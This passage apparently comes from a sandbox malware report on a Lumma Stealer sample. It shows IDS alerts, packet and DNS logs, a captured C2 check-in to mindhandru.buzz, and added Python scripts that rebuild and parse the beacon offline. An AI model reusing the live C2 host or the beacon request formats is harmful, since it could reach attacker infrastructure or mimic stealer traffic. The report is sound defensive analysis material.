2024-12-27T08:52:52.705000+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49709 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:01.537276+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49733 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:04.266975+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49741 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:06.862831+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49748 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:06.873316+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.7 | 49748 | 104.21.11.101 | 443 | TCP
2024-12-27T08:53:12.098083+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49763 | 104.21.11.101 | 443 | TCP
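Read per flow rather than per line, the alert table tells a cleaner story: every TLS connection to 104.21.11.101 opens with the severity-3 JA3 fingerprint alert (JA3 is computed from the ClientHello, so it is always the first alert on a flow), and on four of the eight flows a severity-1 MALWARE signature follows within about a second: check-in on 49700 and 49702, exfiltration on 49703, and the zipped "screen." upload on 49748. The remaining flows carry the fingerprint alert alone, which Suricata by itself leaves at severity 3. The following correlation script is an added example for this page, not part of the Joe Sandbox report or of Suricata; it embeds the alerts exactly as listed above and groups them by 5-tuple to produce one verdict per connection.

```python
"""Flow-level correlation of the Suricata alerts listed in the report (added example)."""
from collections import Counter, defaultdict
from datetime import datetime

CLIENT, SERVER, SERVER_PORT = "192.168.2.7", "104.21.11.101", 443
JA3_SIG = "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"


def _alert(ts, sid, sig, severity, sport):
    """One alert row; every row on this page shares the same client, server, port and protocol."""
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": sid, "sig": sig, "severity": severity,
        "src": CLIENT, "sport": sport, "dst": SERVER, "dport": SERVER_PORT, "proto": "TCP",
    }


# Transcribed from the Suricata alert table above.
ALERTS = [
    _alert("2024-12-27T08:52:45.545108+0100", 2028371, JA3_SIG, 3, 49700),
    _alert("2024-12-27T08:52:46.304703+0100", 2049836, "ET MALWARE Lumma Stealer Related Activity", 1, 49700),
    _alert("2024-12-27T08:52:46.304703+0100", 2054653, "ET MALWARE Lumma Stealer CnC Host Checkin", 1, 49700),
    _alert("2024-12-27T08:52:47.713609+0100", 2028371, JA3_SIG, 3, 49702),
    _alert("2024-12-27T08:52:48.566284+0100", 2049812, "ET MALWARE Lumma Stealer Related Activity M2", 1, 49702),
    _alert("2024-12-27T08:52:48.566284+0100", 2054653, "ET MALWARE Lumma Stealer CnC Host Checkin", 1, 49702),
    _alert("2024-12-27T08:52:50.224169+0100", 2028371, JA3_SIG, 3, 49703),
    _alert("2024-12-27T08:52:51.263028+0100", 2048094, "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration", 1, 49703),
    _alert("2024-12-27T08:52:52.705000+0100", 2028371, JA3_SIG, 3, 49709),
    _alert("2024-12-27T08:53:01.537276+0100", 2028371, JA3_SIG, 3, 49733),
    _alert("2024-12-27T08:53:04.266975+0100", 2028371, JA3_SIG, 3, 49741),
    _alert("2024-12-27T08:53:06.862831+0100", 2028371, JA3_SIG, 3, 49748),
    _alert("2024-12-27T08:53:06.873316+0100", 2843864,
           "ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2", 1, 49748),
    _alert("2024-12-27T08:53:12.098083+0100", 2028371, JA3_SIG, 3, 49763),
]


def group_by_flow(alerts):
    """Bucket alerts by (src, sport, dst, dport, proto), each bucket in (time, SID) order."""
    flows = defaultdict(list)
    for a in alerts:
        flows[(a["src"], a["sport"], a["dst"], a["dport"], a["proto"])].append(a)
    for rows in flows.values():
        rows.sort(key=lambda a: (a["ts"], a["sid"]))
    return dict(flows)


def flow_verdicts(alerts):
    """One verdict per flow: fingerprint-only stays 'suspicious'; a severity-1 hit makes it 'confirmed'."""
    verdicts = {}
    for key, rows in group_by_flow(alerts).items():
        ja3 = [a for a in rows if a["sig"] == JA3_SIG]
        confirmed = [a for a in rows if a["severity"] == 1]
        lead = (confirmed[0]["ts"] - ja3[0]["ts"]).total_seconds() if ja3 and confirmed else None
        verdicts[key] = {
            "sids": [a["sid"] for a in rows],
            "suspicious_tls_fingerprint": bool(ja3),
            "confirmed_malicious": bool(confirmed),
            "seconds_from_ja3_to_confirmation": lead,
        }
    return verdicts


def confirmed_client_ports(alerts):
    """Client source ports of the flows that carried a severity-1 signature."""
    return sorted(key[1] for key, v in flow_verdicts(alerts).items() if v["confirmed_malicious"])


def signature_counts(alerts):
    return Counter(a["sid"] for a in alerts)


if __name__ == "__main__":
    for key, v in flow_verdicts(ALERTS).items():
        state = "CONFIRMED" if v["confirmed_malicious"] else "suspicious"
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  {state}  sids={v['sids']}")
```

The time-to-confirmation figures are small (about 0.76 s, 0.85 s, 1.04 s and 0.01 s), so in a live environment the JA3 alert alone would rarely buy a response window; its value here is as the common key that ties the later signature hits to one C2 server.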
TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:52:44.276346922 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:44.276386023 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:44.276467085 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:44.279360056 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:44.279373884 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:45.545032024 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:45.545108080 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:45.548491001 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:45.548499107 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:45.548825979 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:45.597809076 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:45.602840900 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:45.603477955 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:45.603521109 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:46.304723024 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:46.304830074 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:46.304908991 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:46.344019890 CET | 49700 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:46.344053030 CET | 443 | 49700 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:46.499353886 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:46.499389887 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:46.499485970 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:46.500463963 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:46.500475883 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:47.713458061 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:47.713608980 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:47.715656996 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:47.715665102 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:47.715939999 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:47.717220068 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:47.717322111 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:47.717339039 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566292048 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566360950 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566392899 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566425085 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566452980 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.566456079 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566483021 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566519976 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.566531897 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566565037 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566595078 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566603899 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.566603899 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.566622019 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566665888 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566682100 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.566690922 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.566745996 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.686094999 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.690155029 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.690207958 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.690248013 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.690273046 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.690313101 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.690360069 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.690360069 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.690478086 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.690495968 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.690510988 CET | 49702 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.690516949 CET | 443 | 49702 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.962174892 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.962234020 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:48.962315083 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.962790966 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:48.962802887 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:50.223952055 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:50.224169016 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:50.225666046 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:50.225682020 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:50.226000071 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:50.227370977 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:50.227530003 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:50.227565050 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:51.263036013 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:51.263145924 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:51.266550064 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:51.266630888 CET | 49703 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:51.266650915 CET | 443 | 49703 | 104.21.11.101 | 192.168.2.7
Dec 27, 2024 08:52:51.444758892 CET | 49709 | 443 | 192.168.2.7 | 104.21.11.101
Dec 27, 2024 08:52:51.444811106 CET | 443 | 49709 | 104.21.11.101 | 192.168.2.7
                                                                                              Dec 27, 2024 08:52:51.444914103 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:51.445231915 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:51.445244074 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.704725981 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.704999924 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.706315994 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.706326962 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.706629038 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.708029985 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.708152056 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.708180904 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.708240986 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.755346060 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:59.962419033 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:59.962528944 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:59.962579966 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:59.974379063 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:59.974411011 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:00.278326988 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:00.278366089 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:00.278445959 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:00.278740883 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:00.278752089 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.537177086 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.537276030 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.538604021 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.538620949 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.538878918 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.545842886 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.545991898 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.546025991 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.546107054 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.546119928 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:02.505861044 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:02.505959034 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:02.506015062 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:02.537358999 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:02.537399054 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:03.052781105 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:03.052838087 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:03.052922010 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:03.053272963 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:03.053289890 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.266855955 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.266974926 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.268425941 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.268438101 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.268681049 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.277715921 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.277715921 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.277748108 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.022902966 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.023011923 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.023210049 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.023308992 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.023329973 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.585314035 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.585347891 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.585402966 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.586052895 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.586066008 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.862765074 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.862831116 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.865878105 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.865886927 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.866127014 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.872092009 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.872837067 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.872867107 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.872970104 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.872999907 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.873188019 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.873224020 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874197960 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874226093 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874366999 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874397993 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874615908 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874648094 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874656916 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874667883 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874811888 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874840021 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874862909 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874996901 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.875022888 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.919327021 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922739029 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922770977 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922795057 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922816038 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922833920 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922847033 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922872066 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922877073 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:10.990108013 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:10.990396976 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:10.990475893 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:10.990771055 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:10.990789890 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:11.002892017 CET49763443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:11.002938986 CET44349763104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:11.003148079 CET49763443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:11.003447056 CET49763443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:11.003462076 CET44349763104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:12.098083019 CET49763443192.168.2.7104.21.11.101
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:52:44.131937027 CET | 54337 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 08:52:44.269834042 CET | 53 | 54337 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 08:52:44.131937027 CET | 192.168.2.7 | 1.1.1.1 | 0x4f81 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 08:52:44.269834042 CET | 1.1.1.1 | 192.168.2.7 | 0x4f81 | No error (0) | mindhandru.buzz | | 104.21.11.101 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:52:44.269834042 CET | 1.1.1.1 | 192.168.2.7 | 0x4f81 | No error (0) | mindhandru.buzz | | 172.67.165.185 | A (IP address) | IN (0x0001) | false
                                                                                              • mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | 7380 | C:\Users\user\Desktop\ARoqFi68Nr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:52:45 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: mindhandru.buzz
2024-12-27 07:52:45 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
2024-12-27 07:52:46 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:52:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=v7bi6go2hcrvifvfsd1n8n2ftk; expires=Tue, 22 Apr 2025 01:39:25 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqPCN36Uv%2BJCgmDWWF8XWIRGJwEWhiVu%2F6t12K3jmSRTHAOYuNoYpDwfQz5goYtjdYhW%2FcFd2y7zD4X2EMjT4HPv%2B2eJoecGb3Li0qLsE2K3ATHTXdgu5fmt4R7rSkTVUDk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bba66a945e71-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1588&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1801357&cwnd=238&unsent_bytes=0&cid=2e067d61d317d6f7&ts=773&x=0"
2024-12-27 07:52:46 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
2024-12-27 07:52:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0
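The session above is the whole LummaC check-in as captured: a POST to /api with the 8-byte form body act=life, answered with a chunked "ok"; the next session in this report sends act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j= and receives a large chunked payload whose first chunk header is 24ac. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it rebuilds the request from the bytes shown in the Data Raw rows, reassembles the chunked reply, and flags the /api form-body pattern so the same logic can be run over other captures offline. The function names and the verdict labels (beacon, message_fetch) are this example's own; every sample byte is copied from the report's rows.

```python
"""
Added example (not the report's or the sample's code): offline analyser for
the HTTP exchanges shown in the Joe Sandbox session tables. It splits a
captured HTTP/1.1 request, reassembles Transfer-Encoding: chunked replies
and flags the LummaC '/api' form-body pattern (act=life, act=recive_message).
"""
from urllib.parse import parse_qs

# Constructed from the report, session 0: the 262-byte request head exactly
# as captured, followed by the 8-byte body shown as "61 63 74 3d 6c 69 66 65".
BEACON_REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 8\r\n"
    b"Host: mindhandru.buzz\r\n"
    b"\r\n"
) + bytes.fromhex("61 63 74 3d 6c 69 66 65")

# Constructed from the report, session 0: the two IN data rows of the reply,
# i.e. one 2-byte chunk ("2\r\nok\r\n") followed by the terminating chunk.
BEACON_RESPONSE_BODY = bytes.fromhex("32 0d 0a 6f 6b 0d 0a") + bytes.fromhex("30 0d 0a 0d 0a")

# Constructed from the report, session 1: the 53-byte request body and the
# first bytes of the reply, whose chunk header "24ac" announces 0x24ac bytes.
FETCH_BODY = bytes.fromhex(
    "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 "
    "6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d"
)
FETCH_RESPONSE_PREFIX = bytes.fromhex("32 34 61 63 0d 0a 6a 6e 7a 50 38 78 36 4c")


def split_request(raw: bytes):
    """Split an HTTP/1.1 request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
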